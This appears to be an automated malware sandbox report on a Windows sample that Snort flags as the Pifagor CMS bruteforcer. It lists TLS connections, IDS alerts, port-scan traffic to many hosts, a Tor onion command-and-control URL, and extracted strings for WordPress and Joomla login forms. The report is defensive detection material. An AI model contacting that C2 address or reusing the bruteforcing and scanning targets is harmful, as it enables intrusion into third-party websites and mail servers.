Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:62909 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.226.37.158:443 -> 192.168.2.4:62806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:62924 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:62923 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:62915 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:62918 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:63558 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:62884 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:63278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:63481 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:63476 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:63562 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:63517 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:63568 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:63533 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:63567 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:63585 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:63587 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:63583 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:63732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:63590 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:63586 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:62899 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:64149 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:64232 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:64335 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:64233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:64236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:64473 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:64387 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:64311 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:64102 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:64229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:64237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:64234 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:64372 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:64304 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:64329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:64220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:64228 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:64225 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:64388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:64334 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:64308 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:65151 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:64895 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:65122 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:64705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:65065 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:65067 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:65072 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:65117 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:65200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:65206 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:65203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:65482 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:65374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:65302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:65068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:65483 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:49296 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:65301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:65271 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:49351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:49164 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:65493 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:49517 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:49519 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.19.159.64:443 -> 192.168.2.4:65467 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:49461 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:49413 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:49310 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:49479 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:49285 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:49504 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:49454 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:49508 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:49452 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:49681 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:49694 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:50134 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:50255 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:50666 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:50463 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:49923 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:50469 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:50818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:50826 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:50488 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51030 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:50493 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:51002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:50718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:50821 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:50822 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:50264 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51102 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:51197 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:51203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:51115 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:51330 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:51276 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:51315 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:51181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:51105 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:51350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:51189 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:51448 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:51277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:51574 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.226.37.158:443 -> 192.168.2.4:51106 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:51380 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:51602 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:51428 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:51540 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:51701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:51798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:51381 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:51799 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:51382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:51755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:51505 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:52052 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:51334 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:51693 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:52241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:52165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:52329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:52252 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:52420 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:52337 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:52426 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:52390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:52454 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:52453 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:52494 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:52552 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:52534 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:52460 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:52478 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:52952 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:52662 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:52720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:52696 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:52666 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:53143 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:53083 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:53186 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:53071 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:53236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:52730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:53210 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:53147 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:53145 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:53224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:53272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:53167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:53290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:55752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:55748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:55749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:55727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56099 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:56103 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:56109 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:56108 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:56066 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:56118 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:56209 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:56197 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:56200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:56222 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:56237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56258 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:56137 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:56116 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:55706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:56264 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:56300 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:56312 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:56317 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56320 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:56304 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:56351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:56307 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56379 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:56352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56391 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:56417 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:56432 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:56411 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:56409 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:56421 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:56435 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:56451 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:56533 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56567 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:56577 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56618 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:56828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:56848 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:56882 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:56894 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:57033 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:57066 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:57176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:57161 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:57253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:57282 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:57155 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:57406 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:57389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:57447 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:57801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:57825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:57854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:58017 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:58194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:58314 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:59179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:59256 version: TLS 1.2
Source: Binary string: "C:\telurayutejaxe.pdb source: klWGq3yDcQ.exe
Source: Binary string: C:\telurayutejaxe.pdb source: klWGq3yDcQ.exe

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2047070 ET CURRENT_EVENTS Parrot TDS Check M2 34.136.104.255:443 -> 192.168.2.4:56292
Source: TrafficSnort IDS: 2813008 ETPRO TROJAN Win32/CMSBrute/Pifagor Attempted Bruteforcing 192.168.2.4:51025 -> 139.162.169.45:80
Found Tor onion address
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/hb.php?n=19EE1A200E1DF5D59DA8&i=1233538
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{
Source: csrss.exe, 00000004.00000002.3484645530.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 162.250.126.5 ports 22,222,3,443,4,80,21
Source: global trafficTCP traffic: 74.220.219.189 ports 22,143,110,220,990,222,3,443,465,993,4,587,995,2222,80,21
Source: global trafficTCP traffic: 52.101.42.6 ports 143,110,465,993,587,5,995,9
Source: global trafficTCP traffic: 52.101.42.4 ports 143,110,1,3,465,993,4,587,995
Source: global trafficTCP traffic: 15.236.236.160 ports 25,26,143,110,220,1,2525,3,465,993,4,587,995
Source: global trafficTCP traffic: 212.159.8.200 ports 25,143,110,220,1,3,465,993,4,587,995
Source: global trafficTCP traffic: 162.241.24.104 ports 143,110,220,465,993,4,587,5,995,6
Source: global trafficTCP traffic: 212.97.32.100 ports 25,143,110,2525,465,993,4,587,5,995,6
Source: global trafficTCP traffic: 68.168.209.252 ports 22,990,2,222,443,80,21
Source: global trafficTCP traffic: 81.169.145.157 ports 22,990,110,1,2,222,443,995,2222,80,21
Source: global trafficTCP traffic: 104.247.74.107 ports 22,990,2,222,443,2222,80,21
Source: global trafficTCP traffic: 191.6.210.8 ports 22,990,222,3,443,4,80,21
Source: global trafficTCP traffic: 216.250.121.106 ports 22,990,1,2,443,995,80,21
Source: global trafficTCP traffic: 144.76.107.16 ports 25,220,110,2525,465,587,5,995,9
Source: global trafficTCP traffic: 117.20.63.148 ports 22,2031,2030,2,222,443,2222,80,21
Source: global trafficTCP traffic: 104.47.73.138 ports 25,143,110,220,1,3,465,993,4,587,995
Source: global trafficTCP traffic: 185.135.132.105 ports 22,990,222,3,443,4,995,80,21
Source: global trafficTCP traffic: 81.169.145.74 ports 22,990,2,222,443,2222,80,21
Source: global trafficTCP traffic: 15.235.14.141 ports 22,990,1,2,222,443,2222,80,21
Source: global trafficTCP traffic: 109.168.109.224 ports 22,990,2,222,443,80,21
Source: global trafficTCP traffic: 52.206.191.232 ports 22,990,1,2,222,443,80,21
Source: global trafficTCP traffic: 164.52.221.51 ports 22,990,222,3,443,4,80,21
Source: global trafficTCP traffic: 193.203.239.23 ports 143,110,220,1,3,465,993,4,587,995
Source: global trafficTCP traffic: 185.230.63.171 ports 22,990,222,3,443,4,2222,80,21
Source: global trafficTCP traffic: 133.130.97.143 ports 22,143,990,110,2,222,443,465,993,587,995,80,21
Source: global trafficTCP traffic: 184.106.54.2 ports 110,143,993,5,995,9
Source: global trafficTCP traffic: 185.154.212.10 ports 22,990,222,3,443,4,80,21
Source: global trafficTCP traffic: 15.222.16.209 ports 143,110,1,3,465,993,4,995
Source: global trafficTCP traffic: 162.210.96.117 ports 22,0,222,443,995,8,80,21
Source: global trafficTCP traffic: 72.167.58.161 ports 22,25,0,143,110,220,990,443,465,993,587,995,8,80,21
Source: global trafficTCP traffic: 108.166.43.2 ports 143,110,993,5,995,9
Source: global trafficTCP traffic: 74.208.5.3 ports 25,26,143,110,220,2525,465,993,4,587,5,995,6
Source: global trafficTCP traffic: 104.26.13.245 ports 22,990,1,2,222,21
